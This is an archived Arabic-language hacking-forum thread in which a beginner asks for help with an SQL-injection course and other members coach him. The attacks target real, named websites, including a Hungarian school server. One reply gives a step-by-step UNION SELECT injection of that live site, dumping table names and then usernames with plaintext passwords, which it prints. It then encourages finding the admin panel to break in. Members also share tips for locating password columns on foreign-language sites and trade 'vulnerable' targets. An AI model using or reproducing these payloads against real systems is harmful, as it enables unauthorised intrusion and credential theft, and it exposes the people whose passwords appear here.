:: vBspiders Professional Network :: - سؤال بسيط فى دورة sql

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)

- - سؤال بسيط فى دورة sql (http://www.vbspiders.com/vb/showthread.php?t=63014)

سؤال بسيط فى دورة sql

انا وصلت لدرس الثامن بطبق نفسى الى هنالك بيقولى ايرور وجبت العواميد وكلة صح
اصدار القاعدة5 شوف فية حاجة غلط فى الى انا كتبة ولو فية صلحولى
خشوا هنا وقولى
http://www.ath-elite.com.au/trainers.php?id=-28 UNION SELECT
1,concat(table_name,0x3a,column_name,0x3a,table_sc hema),3,4,5+from+information_schema.columns+where+ column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

رد: سؤال بسيط فى دورة sql

السلام عليكم و رحمة الله و بركاته

بصراحة بما أنك قد وصلت لتلك المرحلة من الحقنة يعني أنك فهمت مبدأ الحقن، بالتوفيق

راح أحاول أشرح لك قدر ما تفهم فقط !!!

شوف أخي، لو تلاحظ أنك في الحقنة كنت تبحث عن عمود إسمه يشابه أو يقارب كلمة pass

و ذلك من خلال الإستعلام التالي : where+column_name+like+%pas%

و إن وجده، راح يظهر لك إسم الجدول لي موجود عليه العمود و إسم العمود و إسم جدول السجما

و ذلك من خلال إستعلامك لي واضعه أنت شوف : concat(table_name,0x3a,column_name,0x3a,table_sche ma)

و لكن لا تخاف إستغلالك صحيح، فلماذا نتج لك الخطأ ؟

أنا راح أجيبك، لانو عند وضعك للإستعلام لم يوجد أي عمود يشبه كلمة %pas% و هذا لا يعني أنك خاطئ

نصيحة مني أن لا تعتمد على مثل هذه المواقع

و الحقنة قد تستطيع إكمالها و لكن بدون فائدة و السبب أنه لا يوجد عمود خاص بالباسوارد

و مثل هذه المواقع تجدها لا تعتمد على تسجيل الأعضاء في قاعدة البيانات، كما تجدها لا تعتمد على إدارة الموقع من خلال لوحة التحكم و إنما المدير يدير موقعه إما مباشرة من السيبنل أو من الأف تي بي أو من سيرفره الشخصي على ما أعتقد

أتمنى تكون فهمت الفكرة و لو قليلا

نصيحة أخيرة : في الحقن تأكد أن موقع واحد للتعلم لا يكفي، حاول إيجاد مواقع كثيرة و لا تعتمد على ما يأتي في الدورات فقط، لأن في الدورات يفهمك الأساس، و على ذلك الأساس يجب أن تكمل وحدك لتفهم الباقي

بالتوفيق إن شاء الله !!!

رد: سؤال بسيط فى دورة sql

طب بوص يا اخى انا كدة ماشى مظبوط والحمد لله عايز مواقع سهلة كتير اجرب اجيب عليها
العمود المصاب واجرب عليها دية لانى دورت ملاتشى

رد: سؤال بسيط فى دورة sql

الانترنت عندي ضعيف جدا عشان ماقدرتش احقنه واعرف وين المشكله
اهم شيء يكون الاستعلام بجلب التابلز بعدين راح تقدر تعرف وين الجدول الصحيح لكن اهم نقطه انو تعرف كيف تتعامل مع لغة الموقع
انا مثلا بدي احقن موقع برازيلي الباس يكون senha هو كلمة password
مثلا موقع ارجنتيني راح يكون clave وهي كلمة باسورد
موقع دنيماركي navn وهي كلمة باس
موقع اكرانيا ورومانيا راح تكون hoslo وهي باسورد
لازم تعرف لغة الموقع عشان تقدر ترجم حقنتك
لذا دايما استعين بالله ثم باستعلام tables

رد: سؤال بسيط فى دورة sql

شكرا جدا ليكوا كلكم ما شاء الله
بس انا عايز موقع اجرب علية الحجات دية عربى اجرب علية بس مثلا العواميد تكون كل حاجة سهلة اجرب علية عشان اخلصة بسرعة ممكن

رد: سؤال بسيط فى دورة sql

ادخل غرفة الحقن تلاقي مواقع مصابه ومحقونه ادرب عليها
موفق باذن الرحمن

رد: سؤال بسيط فى دورة sql

انا هدور بس انا عايز منك انت مع انك محترف عايز واحد سهل كل حاجة سهلة اجرب علية
دورة الحقن كلها لو تجيبة تشكر اوى وربنا يخليك لينا لانى انت مبتبخلشى برد

رد: سؤال بسيط فى دورة sql

اقتباس:

المشاركة الأصلية كتبت بواسطة Mezo Shams (المشاركة 440116)

ياخي العزيز انزع كلمة محترف انا مثلي مثلك كلنا بنتعلم نفيد ونستفيد
واي استفسار احنا جاهزين نحاول نوصلك المعلومه قدر استطاعتنا
موفق باذن الله

رد: سؤال بسيط فى دورة sql

اوك انا اسف جدااا
انا عايز بقة موقع اجرب علية يكون سهل

رد: سؤال بسيط فى دورة sql

انا مش عايز بردو شوفلى اية الغلط
http://starsupporta.harmonouniversa....how.php?id=-27 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_ schema),4,5,6,7+from+information_schema.columns+wh ere+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

رد: سؤال بسيط فى دورة sql

عودة من جديد

أخي لو بدك أعطيك موقع و راح نحقنه بإذن الله

يعني أضع الرابط و أتركك تستخرج المعلومات لوحدك

و لو ما تستطيع راح أساعدك :)

رد: سؤال بسيط فى دورة sql

بوص هاتلى موقع اعمل علية كل حاجة واستخرج بيناتة وخلاص يا باشا

رد: سؤال بسيط فى دورة sql

يا أخي لا تقلق، نحن هنا للمساعدة

تفضل، هذا موقع مصاب و سهل جدا إستخراج المعلومات :

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1

لو قدرت تستخرج المعلومات يعني خلاص تقدر تشتغل بالـ SQL

حاول فقط التركيز قبل لا تعمل و تقولي شوف وين المشكلة

بالتوفيق ....

رد: سؤال بسيط فى دورة sql

بوص انا اهوة استخدمت
order by
لغيت لما عرفت عدد العواميد لاتهم 8
عملت الموضع كدة شوف قولى حاجة غلط اصل بيطلعلى ايرور
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

رد: سؤال بسيط فى دورة sql

تم العثور على الاسم والباص بس لسة فية تكملة بس اوحشة الموقع دة ان الاسم والباص انا مش شايفهم اصلا الموقع حد يجبهولى منة
وانا هاجرب شوية حجات
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_sche ma),2,3,4,5,6,7,8+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

رد: سؤال بسيط فى دورة sql

أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك

راح تكون هذه آخر مساعدة أقدر أعملهالك

و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة

لنبدأ على بركة الله :

الموقع مصاب و الدليل لما نضع الـ(') شوف :
['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1
[/CODE]

الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

الآن نشوف إصدار قاعدة البيانات من خلال العمود 1 و راح نجد أن الإصدار هو الإصدار رقم 5

نطبق الحقنة التالية مباشرة، لاحظ جيدا :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns--

لحد الآن ماشاء الله الحقنة تعمل، الآن نروح نبحث عن العمود يلي إسمه يشبه %pas% و نكون وصلنا لهذه الحقنة :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--

ما شاء الله، و الحمد لله، ظهر العمود و كل شيء الخاص بالعمود لي يشبه %pas%

الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية :
users:passwd:berze_web

يعني أن إسم الجدول هو users و إسم العمود هو passwd

الآن نكمل الحقنة و راح تصير هكذا :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--

ما شاء الله، و الحمد لله، ظهرت لنا جميع الأعمدة الموجودة في الجدول users و هي :
login_name و passwd

و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users--

ما شاء الله، و الحمد لله، إنتهينا و إستخرجنا معلومات الموقع و مدير الموقع وهذه هي :
user1 = rlaci
pass1= chipchip

user2= www
pass2= HEkbY3U6

الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك

للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع

هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك

بالتوفيق إن شاء الله

تحيتي ...

رد: سؤال بسيط فى دورة sql

انا عملت كدة عل ى فكرة وشوف الرد فى فوق دة علطول هتلاقينى عملتة بس الباص مش شايفة اوى
الصورة مخبية علية انا كدة فرحان لانى عرفت وماشى صح شكرا ليك

رد: سؤال بسيط فى دورة sql

لا شكر على واجب، أنا رجعت للمنتدى لأخدم أعضائه

بالتوفيق إن شاء الله و أتمنى أنك تسجل الشرح كإجابة للموضوع

حتى يستفاد الأعضاء الباقون

بالتوفيق

رد: سؤال بسيط فى دورة sql

تم يا غالى بس انا عايز اخر طلب من حضرتك اخر طلب بس عايز كمان موقع واحد سهل بردو اجرب علية اشوف كدة انا بقيت حلو ولا لسة